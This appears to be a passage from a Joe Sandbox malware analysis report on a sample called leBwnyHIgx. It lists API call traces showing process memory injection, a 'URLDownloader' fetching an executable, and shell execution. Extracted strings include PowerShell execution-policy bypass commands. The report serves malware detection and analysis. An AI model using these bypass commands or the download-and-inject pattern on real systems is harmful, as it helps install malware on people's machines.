Concurrency::task_continuation_context::task_continuation_context 30281->30286 30283 100147ca 30291 100036d0 memcpy 30283->30291 30285 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 30285->30141 30288 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 30286->30288 30292 100048e0 6 API calls Concurrency::task_continuation_context::task_continuation_context 30286->30292 30290 100036d0 memcpy 30288->30290 30289->30138 30290->30283 30291->30285 30292->30288

                                                                                    Executed Functions

                                                                                    Function 00421DFC Relevance: 122.8, APIs: 8, Strings: 62, Instructions: 333networkmemoryinjectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 004221FC: LoadLibraryA.KERNEL32(?), ref: 004222E4
                                                                                    • VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 00421E22
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00421E52
                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00421E5E
                                                                                    • VirtualProtect.KERNEL32(?,00000001,00000040,?), ref: 0042206B
                                                                                    • WriteProcessMemory.KERNEL32(000000FF,?,?,00000064,?), ref: 00422081
                                                                                    • connect.WS2_32(?,?,00000010), ref: 00422098
                                                                                    • recv.WS2_32(?,?,00001000,00000000), ref: 004220BA
                                                                                    • closesocket.WS2_32(?), ref: 004220F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocLibraryLoadMemoryProcessProtectStartupWriteclosesocketconnectrecvsocket
                                                                                    • String ID: -$-$-$.$.$.$.$.$.$.$/$/$/$1$3$5$6$:$R$U$a$a$a$c$c$e$e$e$h$h$i$k$l$m$n$o$o$o$p$p$p$p$r$s$s$s$s$s$s$s$t$t$t$t$u$u$v$w$x$x$y$y
                                                                                    • API String ID: 1908411163-4220177053
                                                                                    • Opcode ID: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction ID: 6eba19237a2e4297c06948fbfb06263f303c5671ab06a48b70b181f2cbbdbc92
                                                                                    • Opcode Fuzzy Hash: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction Fuzzy Hash: C081FD20D083D8DEEB21C7A8D84CBDDBFB55F12748F184199D1887B282C7FA1589CB66
                                                                                    Function 00CD0032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 00CD04AE
                                                                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 00CD04DE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInfoNativeSystemVirtual
                                                                                    • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                    • API String ID: 2032221330-2899676511
                                                                                    • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction ID: 92b099bfd9c4fa2633575a8a1bdf175508938e56ea1e7b4a0c1b1bbc9fb17c3c
                                                                                    • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                    • Instruction Fuzzy Hash: 37626A315083858FD720CF28C840BABBBE5FF94704F24492EEAD99B351E7749A49CB56
                                                                                    Function 0040C9BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9EE
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040CA7C,?,?), ref: 0040C9F7
                                                                                      • Part of subcall function 0040C86C: FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                      • Part of subcall function 0040C86C: FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction ID: dd154ea817c974e97ef7d73b686066fe5e2276528df8cc7754812583d82bc4d2
                                                                                    • Opcode Fuzzy Hash: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction Fuzzy Hash: F8116370B00109DBDB00FBA6D982AAEB7B8EF45704F50457FA504B76D2DB385E058B59
                                                                                    Function 0040C86C Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction ID: a79f3244e1dae306cfdd43c11d9e05b1965ff1ec8325b00f92b99aced98e3e72
                                                                                    • Opcode Fuzzy Hash: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction Fuzzy Hash: D8F0B472550608EED710FB79CD9298DBBECEB4431576005B6F400F32D2EA385F00551C
                                                                                    Function 0040E56C Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction ID: 47ab257af6e364695ea890f9b43c82e37ccfc4e8ddd737aab863078b62403aa0
                                                                                    • Opcode Fuzzy Hash: 899fa9c962831e78d20aa585cacba709b3b6a16b28d6df11c32fd39be051b51c
                                                                                    • Instruction Fuzzy Hash: 0DA012108084001AC404BB194C4340F39C45941514FC40264745CB56C2E61A866403DB
                                                                                    Function 10005760 Relevance: 49.3, APIs: 20, Strings: 6, Instructions: 3822sleepprocesssynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 176 10005760-1000b26e call 10017290 call 10002da0 call 10002e20 call 10001cd0 call 10011770 call 10012640 call 10001cd0 call 10011770 call 10012640 call 10005400 * 2 call 10002ec0 * 2 call 10004fe0 call 10002cd0 call 10002cb0 call 10004fe0 call 10002cd0 call 10002cb0 GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 429 1000b270-1000b277 176->429 430 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 176->430 432 1000b296 429->432 433 1000b279-1000b295 WaitForSingleObject CloseHandle 429->433 435 1000b3a3-1000b443 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 430->435 496 1000b54e-1000b561 430->496 432->435 433->432 483 1000b448-1000b548 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 435->483 483->496
                                                                                    APIs
                                                                                    • _Smanip.LIBCPMTD ref: 10005DF2
                                                                                    • _Smanip.LIBCPMTD ref: 1000A195
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                    • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                    • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(100108FE,?,100108FE,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1001092F,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                    • _Smanip.LIBCPMTD ref: 1000A630
                                                                                    • _Smanip.LIBCPMTD ref: 1000A764
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                    • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                    • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                    • _Smanip.LIBCPMTD ref: 1000B046
                                                                                    • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                    • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                    • String ID: .NET Framework Action$/C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 1867003993-3862442261
                                                                                    • Opcode ID: e5c84668ff2e0361885bbcf03fb5359e18a06ac4a9dd02aafd23a928fb285933
                                                                                    • Instruction ID: c3f484f0cadaf97ba32f422996ffd4aa446fbc6566911116cce282fd85213db7
                                                                                    • Opcode Fuzzy Hash: e5c84668ff2e0361885bbcf03fb5359e18a06ac4a9dd02aafd23a928fb285933
                                                                                    • Instruction Fuzzy Hash: 2FD36A50D0D6E8C9EB22C2288C587DDBEB55B22749F4441D9819C2A283C7BF1FD9CF66
                                                                                    Function 10002090 Relevance: 44.3, APIs: 19, Strings: 6, Instructions: 504networkfilesleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 100020D3
                                                                                    • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 100020EF
                                                                                    • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,1001844C,?,?,10017512,000000FF), ref: 10002101
                                                                                    • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10002136
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10002153
                                                                                      • Part of subcall function 10001D60: VariantInit.OLEAUT32(?), ref: 10001D6B
                                                                                      • Part of subcall function 10001D80: VariantClear.OLEAUT32(10002776), ref: 10001D8B
                                                                                      • Part of subcall function 10001A20: _com_issue_error.COMSUPP ref: 10001A92
                                                                                    • InternetReadFile.WININET(?,?,00001000,?), ref: 1000216E
                                                                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10002197
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 10002230
                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10002240
                                                                                    • InternetCloseHandle.WININET(?), ref: 1000224D
                                                                                    • InternetCloseHandle.WININET(?), ref: 10002257
                                                                                    • GetParent.USER32(?), ref: 10002261
                                                                                    • ShowWindow.USER32(?,00000000,?,000000FF), ref: 10002270
                                                                                    • WaitForSingleObject.KERNEL32(0000050C,00007530,?,000000FF), ref: 10002282
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,?,000000FF), ref: 1000228C
                                                                                    • CoCreateInstance.OLE32(1001837C,00000000,00000001,1001836C,00000000), ref: 100022AE
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                      • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                      • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Variant$CloseCreateHandleInitMessageOpenSendSleep$ClearFileHttpInfoInitializeInstanceObjectParentQueryReadShowSingleSnapshotToolhelp32WaitWindow_com_issue_errorexitfclosefopenfwrite
                                                                                    • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$Pou$URLDownloader$wpsv.5.6.3.exe
                                                                                    • API String ID: 2588663270-16662377
                                                                                    • Opcode ID: a0ac462626c3a7957670ed2b0b3d2cc14aaf3fc45bf9131736584503c0dd6dd9
                                                                                    • Instruction ID: 1a265d8126e776f6a60fe0a7d1a5fce7a7262b6fb56b0006430606afee9c3406
                                                                                    • Opcode Fuzzy Hash: a0ac462626c3a7957670ed2b0b3d2cc14aaf3fc45bf9131736584503c0dd6dd9
                                                                                    • Instruction Fuzzy Hash: 89427DB4E012289FDB64CF59C895BDDBBB5BF49300F1082DAE909A7355DB30AA85CF50
                                                                                    Function 1000A2B4 Relevance: 41.2, APIs: 18, Strings: 5, Instructions: 967sleepprocesssynchronizationCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 589 1000a2b4-1000b26e GetTempPathA call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 memset call 10002b60 ShellExecuteExA 804 1000b270-1000b277 589->804 805 1000b29b-1000b39e call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 589->805 807 1000b296 804->807 808 1000b279-1000b295 WaitForSingleObject CloseHandle 804->808 810 1000b3a3-1000b548 Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 805->810 871 1000b54e-1000b561 805->871 807->810 808->807 810->871
                                                                                    APIs
                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                    • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(100108FE,?,100108FE,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1001092F,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                    • _Smanip.LIBCPMTD ref: 1000A630
                                                                                    • _Smanip.LIBCPMTD ref: 1000A764
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                    • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                    • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                    • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                    • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                    • _Smanip.LIBCPMTD ref: 1000B046
                                                                                    • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                    • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                    • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                    • String ID: /C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 1867003993-2154795836
                                                                                    • Opcode ID: e68f2c6455a0b5301ba84bb44f9687bda6d9f088c6ff90b02e06671e58714ec3
                                                                                    • Instruction ID: 5ee5c772d32b0c25501e7099b99da70bcf1678fc7b94072c772d4481403b0835
                                                                                    • Opcode Fuzzy Hash: e68f2c6455a0b5301ba84bb44f9687bda6d9f088c6ff90b02e06671e58714ec3
                                                                                    • Instruction Fuzzy Hash: 88B24C74C08298DEEB25CB68CC45BDEBBB5AF15304F0441D9E14D67292DBB52B88CF62
                                                                                    Function 0040C490 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
